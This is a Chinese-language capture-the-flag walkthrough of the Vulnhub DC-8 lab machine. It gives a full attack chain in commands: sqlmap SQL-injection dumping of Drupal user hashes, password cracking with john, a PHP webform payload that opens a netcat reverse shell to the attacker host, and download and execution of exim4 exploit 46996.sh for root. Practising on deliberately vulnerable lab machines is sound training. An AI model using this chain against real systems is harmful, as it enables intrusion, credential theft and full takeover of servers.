Vulnhub渗透靶机系列----DC8
下载地址
http://www.five86.com/downloads/DC-8.zip
https://download.vulnhub.com/dc/DC-8.zip
环境说明
dc8靶机:10.139.10.148
kali攻击机:10.139.10.152
信息收集
查看mac地址
探测存活主机
sudo netdiscover 10.139.10.0/24
对比mac地址得知ip为10.139.10.148
nmap扫端口
发现开放22端口和80端口
指纹探测
dirsearch目录扫描
漏洞利用
sql注入
手工判断发现存在sql注入
http://10.139.10.148/?nid=2 and 1=1
http://10.139.10.148/?nid=2 and 1=2
//通过返回界面不同,发现存在sql注入
原,不是,sqlmap启动!
sudo sqlmap -u "10.139.10.148/?nid=2" --dbs -batch
查看d7db库里的表
sudo sqlmap -u http://10.139.10.148/?nid=1 -D d7db --tables
查看users表的字段
sudo sqlmap -u http://10.139.10.148/?nid=1 -D d7db -T users --column
可以看到users表的字段里有name,pass两个值,查看这两个字段内容
sudo sqlmap -u http://10.139.10.148/?nid=1 -D d7db -T users -C name,pass --dump
admin
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
john爆破密码
john pass.txt
爆破出密码turtle
用之前扫目录的登录目录,/user/login用爆破出来的账户密码登录
webshell
登录成功后发现 add content,进去后可以写东西,但是没有php格式。
后来在contact us–webform–form setting,发现可写php格式
页面最下面点击保存,同时kali开启监听
<?php system("nc -e /bin/bash 10.139.10.152 4444");?>
然后再contact us写上信息提交
提权
python交互shell
python -c 'import pty;pty.spawn("/bin/bash")'
exim4提权
find / -perm -4000 2>/dev/null
查看exim版本
exim --version
查寻exim漏洞,对比之前的版本信息,找合适的脚本
显示路径,复制到本地
searchsploit -x 46996.sh
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh
然后就是将这个脚本上传到靶机,这里有个点,直接上传运行会报错,由于windows系统下编辑然后上传到linux系统执行会导致的格式错误,要加上本地编辑查看文件类型:set ff=unix,按shift+:set ff=unix,再回车保存退出,然后再去上传执行的时候才不会报错
vim 46996.sh//按esc,再shirf加: 输入set ff=unix
kali开启服务,为了上传sh文件
python -m SimpleHTTPServer 80
验证开启
然后在反弹shell的靶机那远程wget下载,要在tmp目录下才有权限
wget http://10.139.10.152/46996.sh
增加文件权限
chmod 777 46996.sh
执行文件提权
./46996.sh -m netcat
拿到flag